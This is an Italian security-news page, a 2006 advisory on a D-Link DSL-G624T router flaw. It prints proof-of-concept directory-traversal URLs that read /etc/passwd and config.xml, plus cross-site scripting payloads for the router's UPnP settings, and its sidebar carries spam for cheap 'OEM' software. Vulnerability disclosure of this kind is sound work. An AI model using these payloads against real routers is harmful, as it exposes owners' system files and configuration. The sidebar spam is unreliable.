Homepage

|| HOME || NEWS || ARTICOLI|| LIBRI || DOWNLOAD || LINK || FORUM ||

Wi4net

Menu principale

Partner

Microsoft Office 2007 enterprise download Windows 7 Ultimate is the most versatile and powerful edition of Windows 7 buy Adobe Creative Suite 4 OEMIt combines remarkable ease-of-use with the entertainment features of Home Premium and the business capabilities of Professional you can encrypt your data with BitLocker and BitLocker-To-Go. And for extra flexibility, buy Adobe Creative Suite 4 Master Collection oemyou can work in any of 35 languages. Get it all buy Adobe Photoshop CS4 Extended OEMwith Windows 7 Ultimate.

SolidarietÓ

On-line

Ci sono 33 visitatori e
0 utenti on-line

Sei un utente non registrato. Puoi loggarti qui o registrarti liberamente cliccando qui.

Login

 Nickname

 Password

 Ricordami


Non hai ancora un account?
Registrati subito.
Come
utente registrato potrai
cambiare tema grafico
e utilizzare tutti i servizi offerti.

News : VulnerabilitÓ D-Link DSL-G624T ADSL Router
Martedý, 24 Ottobre 2006 - 09:00 - 7156 Letture
Bug
E' stata riscontrata una vulnerabilitÓ in D-Link DSL-G624T ADSL Router.
Quest'ultima Ŕ stata riscontrata in una mancata validazione di alcuni input da parte del device.

Un attaccante remoto sfruttando quest'errore pu˛ visualizzare file arbitrari presenti sul router o eseguire far eseguire codice scripting ad un utente.

EX:

"
Directory transversal
http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting
Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fstate
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: "+onmouseover="alert(20102006)

"
Directory listing
Is possible to list the /cgi-bin directory

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616
 

Link correlati

Vota l'articolo

Questo articolo non Ŕ stato votato

Login/crea un profilo | 0 Commenti
I commenti sono di proprietÓ dei legittimi autori, che ne sono anche responsabili.

Designed By CMSarea


Tutti i loghi e marchi in questo sito sono di proprietÓ dei rispettivi proprietari.
I commenti sono di proprietÓ dei rispettivi autori, ed il resto ę 2003-2005 di mia proprietÓ
Questo sito Ŕ stato creato con MaxDev, un sistema di gestione di portali scritto in PHP. MD-Pro Ŕ un software libero rilasciato sotto la licenza GNU/GPL Visualizzate le nostre news usando il file backend.php

Licenza Creative Commons
Questo/a opera Ŕ pubblicato sotto una Licenza Creative Commons.

I LOGHI DEL SITO SONO STATI GENTILMENTE CREATI DA MEDIALINKS

Powered by MD-Pro